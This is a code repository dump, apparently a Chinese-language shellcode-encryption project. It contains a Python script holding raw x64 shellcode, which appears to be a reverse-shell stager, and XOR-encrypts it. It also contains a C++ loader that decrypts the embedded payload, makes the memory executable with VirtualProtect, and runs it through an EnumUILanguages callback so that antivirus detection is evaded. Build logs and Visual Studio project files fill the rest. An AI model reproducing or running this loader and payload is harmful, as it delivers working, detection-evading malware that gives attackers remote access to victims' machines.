39 | buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
40 | buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
41 | buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
42 | buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
43 | buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
44 | buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
45 | buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
46 | buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
47 | buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
48 | buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
49 | buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
50 | buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
51 | buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
52 | buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
53 | buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
54 | buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
55 | buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
56 | buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
57 | buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
58 | buf += b"\xf0\xb5\xa2\x56\xff\xd5"
59 |
60 | shellcode = bytearray(buf)
61 |
62 | # 定义密钥
63 | key = bytearray(b'henry123456aa+-==@asd')
64 |
65 | # 使用xor_encrypt函数加密shellcode
66 | encrypted_shellcode = xor_encrypt(shellcode, key)
67 |
68 | # 输出加密后的shellcode
69 | print("Encrypted shellcode:")
70 | encrypted_shellcode_string = ""
71 | for byte in encrypted_shellcode:
72 | encrypted_shellcode_string += ("\\x%02x"%byte)
73 | print(encrypted_shellcode_string)
74 |
75 | if __name__ == '__main__':
76 | main()
77 |
78 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/xor加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.obj
4 | e:\source code\c_code\shellcode加密\x64\debug\xor加密.exe
5 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.ilk
6 | e:\source code\c_code\shellcode加密\x64\debug\xor加密.pdb
7 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.ilk
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.log:
--------------------------------------------------------------------------------
1 | xor加密.cpp
2 | E:\Source Code\C_code\shellcode加密\xor加密\xor加密.cpp(16,32): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | xor加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe
4 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\xor加密.tlog\xor加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
5 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.obj
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/xor加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/xor加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/xor加密/x64/Release/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\xor加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.obj
3 | e:\source code\c_code\shellcode加密\x64\release\xor加密.exe
4 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.ipdb
5 | e:\source code\c_code\shellcode加密\x64\release\xor加密.pdb
6 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.iobj
7 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.iobj
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.ipdb
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.log:
--------------------------------------------------------------------------------
1 | xor加密.cpp
2 | E:\Source Code\C_code\shellcode加密\xor加密\xor加密.cpp(16,32): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | 正在生成代码
4 | Previous IPDB not found, fall back to full compilation.
5 | All 4 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
6 | 已完成代码的生成
7 | xor加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe
8 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\xor加密.tlog\xor加密.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
9 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.obj
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/xor加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/xor加密/xor加密.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main() {
5 | // 存放xor加密后的shellcode
6 | char encryptedShellcode[] = "\x94\x2d\xed\x96\x89\xd9\xfe\x33\x34\x35\x77\x30\x20\x7b\x7f\x6c\x6b\x08\x50\xa1\x01\x20\xee\x3c\x12\x31\xba\x60\x2b\x7c\xbe\x64\x41\x29\xa0\x5f\x6d\x70\x71\xa8\x3b\x6b\xdf\x2f\x24\x3a\x48\xf1\x9e\x0f\x55\x49\x34\x4d\x41\x6a\xec\xf4\x30\x01\x60\xb2\x86\x85\x37\x2f\x23\x31\xba\x60\x13\xbf\x77\x0a\x29\x60\xfb\x4b\xbc\x45\x58\x6a\x71\x6b\xed\x17\x6e\x72\x79\xba\xb2\xbb\x34\x35\x36\x29\xe4\xeb\x59\x5a\x75\x41\xb1\x23\xef\x20\x7d\x2a\xf9\x39\x11\x7b\x32\xe4\xd6\x60\x2c\x50\xe2\x65\xc2\xf4\x01\xea\x47\xec\x20\x64\xb8\x3a\x48\xf1\x9e\x72\xf5\xfc\x3b\x20\x60\xea\x15\xdd\x48\xb1\x2d\x70\x28\x4c\x6d\x2b\x4b\xa8\x44\xea\x6b\x70\xbe\x76\x45\x28\x2a\xfd\x5b\x7c\xcb\x6d\x3b\x20\xe3\x25\x72\x3b\x78\xe1\x73\xb8\x30\xbd\x7e\x60\xb1\x6a\x75\x7c\x65\x1e\x38\x29\x25\x30\x24\x37\x33\x23\x79\xb1\xdf\x14\x74\x64\x9e\x81\x73\x6c\x64\x67\x08\xea\x61\x8d\x23\x9a\x91\x8d\x24\x78\x8c\x44\x47\x07\x69\x52\x53\x2b\x2d\x7c\x6b\x09\xe8\x95\x2c\xe9\x89\xce\x73\x79\x31\x7b\xba\xd1\x7c\x8a\x63\x61\x3a\x71\xfd\x95\x6f\xfa\x32\x30\x21\xec\x8a\x3e\xf0\xc0\x73\x89\x78\x42\x10\x66\x9e\xfe\x61\xb4\xd7\x28\x60\x72\x64\x68\x3c\x2f\xc8\x50\xb1\x59\x33\xcb\xe0\x5c\x6b\x20\x75\x7d\x6d\x70\x71\xa8\x3e\x55\xa8\x2d\x91\xb2\x31\xb8\xf0\x7b\xcb\xf5\x7e\xe8\xa0\x6a\x97\xd7\x32\x9f\x81\x8c\xb1\x20\xec\xa9\x18\x69\x70\x6a\x7f\xbd\xd7\x7e\xe8\x98\x6a\x97\xa4\x98\x34\x00\x8c\xb1\xed\xa5\x1a\x78\x30\xce\xfc\x46\xd1\xdd\xa5\x61\x61\x2b\x65\xbe\xd1\x50\x29\xfa\x86\x25\x54\xa7\x18\x7d\x70\x6a\x7b\xbd\xcc\x77\xdb\x63\xf2\xe5\x62\xc2\x95\xe2\x8b\x64\x16\x30\x26\xf1\xbd\x11\x6c\xba\xc2\x5f\x76\x20\x38\x43\x2d\x2d\x3d\x40\x20\x2b\x2c\xe1\x97\x26\x43\xb0\x70\x88\x6b\x90\x66\xd3\x9e\xb4\x63\xa4\xfe\x74\xc9\xa6\x3e\x55\xa1\x2c\xe7\x82\x31\xb8\xe8\x7b\xbd\xcc\x77\xdb\x63\xf2\xe5\x62\xc2\x95\xe2\x8b\x64\x15\x4d\x36\x33\x2e\x68\x5a\x33\x74\x35\x36\x20\x39\x41\x2d\x67\x7c\xfa\x6a\x5c\x6b\x58\x9a\xbb\x25\x20\x70\x88\x46\x5a\x78\x57\x9e\xb4\x62\xd2\xf3\xd4\x7c\x9e\x8c\x9b\x20\x64\xad\x3a\x50\xf7\x7a\xb6\xc2\x40\x82\x20\x9e\xcc\x75\x57\x3d\x19\x28\xb4\xa6\x98\xd0\xcc\x24\x86\xe4";
7 |
8 | // 定义解密所用的密钥
9 |
10 | char key[] = "henry123456aa+-==@asd";
11 |
12 | // 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
13 | unsigned char shellcode[sizeof encryptedShellcode];
14 |
15 | // 获取密钥的长度
16 | int keylength = strlen(key);
17 |
18 | // 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
19 | for (int i = 0; i < sizeof encryptedShellcode; i++) {
20 | shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
21 | printf("\\x%x", shellcode[i]);
22 | }
23 |
24 | // 获取解密后的shellcode的地址
25 | char* addrShellcode = (char*)shellcode;
26 |
27 | // 声明一个DWORD变量用于存储旧的内存保护属性
28 | DWORD dwOldPro = 0;
29 |
30 | // 更改解密后的shellcode所在内存区域的保护属性,允许执行、读、写
31 | BOOL ifExec = VirtualProtect(addrShellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);
32 |
33 | // 使用EnumUILanguages函数执行解密后的shellcode
34 | EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
35 | }
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {f6e80e9f-0333-4af4-8bbd-e9b6c2a8a4b9}
25 | xor加密
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------